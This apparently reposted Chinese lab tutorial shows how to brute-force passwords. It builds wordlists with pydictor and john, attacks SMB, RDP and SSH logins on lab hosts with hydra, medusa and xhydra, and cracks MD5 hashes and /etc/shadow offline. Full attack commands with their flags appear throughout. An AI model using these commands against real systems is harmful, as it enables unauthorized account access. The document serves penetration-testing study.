当前位置:   article > 正文

暴力破解常见的服务_python pydictor.py -chunk

python pydictor.py -chunk

实战-使用 pydictor 生成自己的字典工具

首先我们开始安装工具到kali上

  1. git clone https://github.com/LandGrey/pydictor.git

 

cd pydictor/

chmod +x pydictor.py

我们给这个python脚本文件加上可执行权限

pydictor 生成字典

pydictor.py 参数说明:

-base 表示密码所使用的字符

-base Type

d

digital

[0 - 9]

# digital [ˈdɪdʒɪtl] 数字的

L

lowercase letters [a - z] # lowercase ['ləʊəˌkeɪs] 小写字母;letters [ˈletəz] 信,字母

c

capital letters

[A - Z] # capital [ˈkæpɪtl] 大写的

-o 指定字典存储的位置

例 1:生成全部由数字组成且长度为 4 到 6 的字典

python pydictor.py -base d --len 4 6

查看生成的字典:

vim /root/pydictor/results/base_032846.txt

例 2:生成支持使用数字、小写字母与大写字母 3 者组合的 2 到 3 位数的爆破字典,把生成的字典存

在/opt/passwd.txt

例 3:生成支持使用数字、小写字母与大写字母 3 者组合的 6 位字典

python pydictor.py -base dLc --len 6 6 -o /opt/666.txt

例 4:生成含有特殊字符的自定义字符集字典

python pydictor.py -char '@#$%^&*abcdefg12345678' --len 3 5

例 5:生成以 Pa5sw0rd 开头,后面 4 位全为数字的字典

python pydictor.py -base d --len 4 4 --head Pa5sw0rd -o

/opt/pass4.txt

将一个目录下多个字典合并去掉重复的记录

实战-使用 hydra 工具在线破解系统用户密码

使用 hydra 破解 Windows 7 文件共享密码

在 Windows 系统当中,默认会启动一些文件共享,比如 C$ 或 ADMIN$(管理共享),而这些共享

是使用 smb 协议,因此我可以针对 smb 协议进行破解。

注:开启文件共享

设置 administrator 用户登录密码。

Windows 7 中开启文件共享之后在 Kali 中扫描 445 端口确保目标主机开启 455 端口

通过 john 工具生成简单的密码字典(一般的弱口令都会包含进去)

john --wordlist --rules --stdout > password.txt

破解 smb 文件共享密码

hydra 命令参数:

-l

#指定单个用户名称

-L

#指定用户名称字典

-p

#指定单个密码

-P

#指定密码字典

-s

#指定端口

-vV

#显示详细的执行过程

然后我们开始对win7进行密码攻击

hydra -l Administrator -P password.txt smb://192.168.36.135 -vV

通过密码进行远程访问目标主机共享资源

在物理机或其他 windows 主机中打开运行窗口,开始菜单中点击运行,或者使用快捷键 Win+R

\\192.168.36.135\c$

输入账号密码后即可进入

使用 hydra 破解 windows 7 远程桌面密码

Windows 远程桌面使用的 rdp 协议,默认端口是 3389,系统中默认是没有开启远程桌面服务的,

我们需要手动开启。

开始->运行-> 输入: sysdm.cpl 打开高级系统设置

同样通过 nmap 扫描 3389 端口确保服务开启。

暴力破解远程桌面密码

通过远程桌面进行连接

开始运行输入 mstsc后开始远程链接

输入刚刚破解出来的账号密码进行利用即可远程登录win7

远程连接成功。

注:如果目标系统用户正在使用操作系统,那么远程连接之后目标用户会被锁定。

使用 hydra 工具破解 ssh 服务 root 用户密码

hydra -l root -P password.txt -t 4 ssh://192.168.36.141 -e nsr -vV

-t 通过-t 参数来指定线程数默认是 16 会造成服务器拒绝连接。切记不能太快。

-e nsr 参数:

该-e 表示提供了更多测试选项。nsr 后面的字母对应更多的测试方式。

n 是尝试空密码登录

s 是将用户名作为密码登录

r 是将用户名反过来作为密码登录。 如:用户名是 root,那么会使用 toor 尝试破解。

实战使用 Medusa 工具在线破解

medusa 命令选项:常用参数标红

-h [TEXT]

#目标 IP

-H [FILE]

#目标主机文件

-u [TEXT]

#用户名

-U [FILE]

#用户名文件

-p [TEXT]

#密码

-P [FILE]

#密码文件

-C [FILE]

#组合条目文件

-O [FILE]

#文件日志信息

-e [n/s/ns]

#n 意为空密码,s 意为密码与用户名相同

-M [TEXT]

#模块执行名称

-m [TEXT]

#传递参数到模块

-d

#显示所有的模块名称

-n [NUM]

#使用非默认端口

-s

#启用 SSL

-r [NUM]

#重试间隔时间,默认为 3 秒

-t [NUM]

#设定线程数量

-L

#并行化,每个用户使用一个线程

-f

#在任何主机上找到第一个账号/密码后,停止破解

-q

#显示模块的使用信息

-v [NUM]

#详细级别(

0-6)

-w [NUM]

#错误调试级别(

0-10)

-V

#显示版本

-Z [TEXT]

#继续扫描上一次

-F

#破解到一个正确的密码即退出

Medusa 工具破解 windows 文件共享密码

medusa -M smbnt -h 192.168.36.135 -e ns -F -u Administrator -P password.txt

Medusa 工具破解 linux root 用户登录密码

medusa -M ssh -h 192.168.36.141 -e ns -F -u root -P password.txt

实战: host.txt 文件中是目标主机名称或者 IP 地址,user.txt 文件中指定需要暴力破解的用户名,

字典使用“m.txt”。使用 8000 进程,同时暴力破解。

参数: -t [NUM]

设定子进程数量

-O ssh.log 可以将成功破解的记录记录到文件中

medusa -M ssh -h 192.168.36.141 -u root -P ./password.txt -t 8 -O ./ssh.log

图形化暴力破解软件 xhydra

暴力破解软件的要素: IP, 用户名 ,端口号, 字典 , 调一下暴力破解的进程数加快速度。

本质上和 hydra 是没有区别的

xhydra

配置目标 IP 端口以及协议类型

配置用户名和密码文件

配置线程以及代理,这里不使用代理。

开始暴力破解

离线破解 md5 值和 shadow 加密文件

破解 md5 值

手动加密 md5 值,破解其他加密方式也是同理。

echo "123456" | md5sum

常见的离线破解方式

md5在线解密破解,md5解密加密

如果我们破解不出来怎么办呢?

接下来我会给大家提供一个py脚本

语法格式 python 脚本名称 (md5 值)(字典文件)

python /root/md5.py f447b20a7fcbf53a5d5be013ea0b15af /root/pydictor/password.txt

解密成功!密码是: 123456

原理很简单,脚本把我们输入的 md5 值跟字典中的所有密码的 md5 值进行对比,结果一致则正确。

破解 Linux shadow 密码

关于 shadow 文件介绍

密码由三部分组成的:$id$salt$encrypted

id 为 1 时,采用 md5 进行加密;

id 为 5 时,采用 SHA256 进行加密;

id 为 6 时,采用 SHA512 进行加密。

使用 john 破解 shadow 密码文件

john /etc/shadow

如果默认的密码字典不能够满足需求,使用下面方式指定字典进行破解。

john /etc/shadow --wordlist=/root/pydictor/password.txt

如果出现

No password hashes left to crack (see FAQ)

#无需破解密码散列(请参阅常见问题解答)

注:这是告诉我们已经有破解成功了。不需要再破解了。

查看破解的结果:

cat /root/.john/john.pot

我这里就不一一截图了,大同小异的东西

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
  

闽ICP备14008679号